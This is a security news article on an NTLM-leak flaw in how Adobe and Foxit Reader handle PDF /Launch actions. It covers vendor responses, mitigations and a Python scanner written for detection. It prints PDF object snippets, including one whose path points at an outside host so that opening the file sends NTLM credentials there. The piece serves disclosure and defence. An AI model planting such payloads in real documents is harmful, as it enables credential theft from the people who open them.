Zero-Day Vulnerability in PDF Files Leaking NTLM Data in Adobe & Foxit Reader


Cybersecurity researchers at EXPMON have uncovered an intriguing “zero-day behavior” in PDF samples that could potentially be exploited by attackers to leak sensitive NTLM authentication data.

The discovery highlights vulnerabilities in how Adobe Reader and Foxit Reader handle certain PDF actions, though researchers emphasize that no evidence suggests the behavior was created with malicious intent in the analyzed samples.

While examining PDF samples uploaded to VirusTotal (VT) years ago, EXPMON researchers identified a previously unknown behavior in the way PDFs execute actions defined within their code.

Specifically, the issue arises from how certain /Launch actions are processed by Adobe Reader and Foxit Reader. If exploited by a malicious actor, this behavior could enable the theft of NTLM information, a key authentication mechanism in Windows networks.

One of the analyzed samples contained the following crucial code snippet:

5 0 obj
  << /Type /Action
     /S /Launch
     /F (/Applications/Calculator.app/Contents/MacOS/Calculator)
  >>
endobj

This code initiates a /Launch action designed to open a file or application. However, when processed by PDF readers in certain configurations, the behavior inadvertently triggers NTLM information leaks.


Vulnerability Analysis

Adobe Reader

When the PDF sample is opened in Adobe Reader, the application attempts to locate a network resource named “Applications.” If successful, it initiates a connection and sends NTLM credentials to the server even before the user sees a warning message.

While this behavior doesn’t allow attackers to use public domain names, they could exploit it in private network environments. By crafting a malicious PDF and using an attacker-controlled local server, bad actors could harvest sensitive NTLM information from victims.

Adobe, however, downplayed the risk, citing design choices that limit this behavior to intranet domains. According to their statement:

“DNS/NTLM calls are only made for intranet domains, not for internet domains. Acrobat considers intranet domains to be trusted when the ‘Automatically trust sites from Win OS security zones’ feature is enabled. This feature is enabled by default in Acrobat.”

Foxit Reader

The vulnerability manifests differently in Foxit Reader. While the original sample doesn’t trigger the NTLM leak, modifying the /F (file path) field to reference a public domain such as pub.expmon.com does. For example, this modified code can leak NTLM credentials to a public server controlled by an attacker:

5 0 obj
  << /Type /Action
     /S /Launch
     /F (/pub.expmon.com/test)
  >>
endobj

When victims open the modified PDF file, their NTLM credentials are sent to the attacker’s public server, even though a warning appears after the fact.
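Both readers, in the cases above, treat the first component of the /Launch /F path as a host name, so a defender can triage PDFs for exactly that pattern before a document ever reaches a reader. The scanner below is an added example written for this article, not EXPMON's tooling or either vendor's code. The sample objects are constructed from the two snippets above plus a benign /URI action and a plain local target; the severity tiers are this example's own heuristic (dotted first component looks like a public host, bare name looks like an intranet host), and it only parses literal-string /F values (hex strings and /F dictionaries would need more parsing).

```python
"""Triage heuristic for /Launch actions whose /F target may be resolved as a host.

Added example for this article, not EXPMON's or a vendor's code. It decodes the
common obfuscations (#xx name escapes, backslash escapes in literal strings) and
reports the first path component a reader might try to reach over the network.
"""
import re
from dataclasses import dataclass

# Constructed sample objects, modelled on the article's snippets (not real malware).
SAMPLE_MAC = b"""5 0 obj
  << /Type /Action
     /S /Launch
     /F (/Applications/Calculator.app/Contents/MacOS/Calculator)
  >>
endobj
"""

SAMPLE_HOST = b"""5 0 obj
  << /Type /Action
     /S /L#61unch
     /F (/pub.expmon.com/test)
  >>
endobj
"""

SAMPLE_LOCAL = b"""6 0 obj
  << /Type /Action /S /Launch /F (notepad.exe) >>
endobj
"""

SAMPLE_BENIGN = b"""7 0 obj
  << /Type /Action
     /S /URI
     /URI (https://example.com/doc)
  >>
endobj
"""

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)
S_RE = re.compile(rb"/S\s*/([A-Za-z0-9#]+)")
# Literal string after /F; also catches a nested /F inside an /F or /Win dictionary.
F_RE = re.compile(rb"/F\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)


def decode_name(raw: bytes) -> str:
    """Decode PDF name #xx escapes (e.g. /L#61unch -> Launch)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def decode_literal(raw: bytes) -> str:
    """Undo the backslash escapes of a PDF literal string."""
    return re.sub(rb"\\(.)", rb"\1", raw).decode("latin-1")


@dataclass
class Finding:
    obj_num: int
    target: str
    first_component: str
    severity: str  # "high", "medium" or "info"


def classify(target: str) -> tuple[str, str]:
    """Return (first path component, severity) for a /Launch target.

    Heuristic assumed by this example: a leading '/' or '\\' means a reader may
    treat the first component as a host name. A dotted component looks like a
    public FQDN (high); a bare name looks like an intranet host (medium); any
    other /Launch is still worth a review (info).
    """
    if target.startswith(("/", "\\")):
        parts = [p for p in re.split(r"[\\/]+", target) if p]
        first = parts[0] if parts else ""
        return first, ("high" if "." in first else "medium")
    return "", "info"


def scan(pdf_bytes: bytes) -> list[Finding]:
    """Return one Finding per /Launch action object found in pdf_bytes."""
    findings = []
    for m in OBJ_RE.finditer(pdf_bytes):
        obj_num, body = int(m.group(1)), m.group(3)
        s = S_RE.search(body)
        if not s or decode_name(s.group(1)) != "Launch":
            continue
        f = F_RE.search(body)
        target = decode_literal(f.group(1)) if f else ""
        first, severity = classify(target)
        findings.append(Finding(obj_num, target, first, severity))
    return findings


if __name__ == "__main__":
    for name, sample in (("mac", SAMPLE_MAC), ("host", SAMPLE_HOST),
                         ("local", SAMPLE_LOCAL), ("benign", SAMPLE_BENIGN)):
        for finding in scan(sample):
            print(f"{name}: obj {finding.obj_num} {finding.severity.upper()} "
                  f"host={finding.first_component!r} target={finding.target!r}")
```

Run against a real file with `scan(open(path, "rb").read())`; objects inside compressed object streams are not visible to this regex pass, so inflate those first or pair the check with a full PDF parser. The "medium" tier is what the Adobe case above produces (first component "Applications"), and the "high" tier is what the modified Foxit sample produces.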

Unlike Adobe, Foxit acknowledged the security implications of this behavior and promptly issued a patch in December 2024.

Vendor Responses

Adobe Reader: Adobe determined the behavior was not a security issue, as it is limited to intranet domains only. They emphasized that this design decision aligns with their trust model for handling network resources.

Foxit Reader: Foxit Software treated the discovery as a legitimate vulnerability, releasing a patched version, Foxit PDF Reader for Windows v2024.4, to address the issue. They encouraged users to download the latest version and highlighted the fix in their security bulletins.

EXPMON’s findings underscore the potential risks of overlooked behaviors in widely used software.

While the identified “zero-day behavior” has not been actively exploited in the wild, it serves as a stark reminder of how easily these vulnerabilities could be weaponized.

EXPMON stressed that their discovery highlights the power of big data analytics (BDA) in identifying missed or unknown threats. By leveraging BDA, the team can retrospectively analyze files and improve exploit detection capabilities.

In a statement, EXPMON shared: “This finding is a good example of the power of BDA analysis and why EXPMON is capable of detecting the most undetected file-based zero-day exploits.”

  • For Adobe Reader Users:
    While Adobe has not released a patch for this behavior, users can mitigate risks by disabling the “Automatically trust sites from Win OS security zones” feature within Acrobat settings.
  • For Foxit Reader Users:
    Users should immediately update to Foxit Reader v2024.4 or higher to ensure protection against this vulnerability.
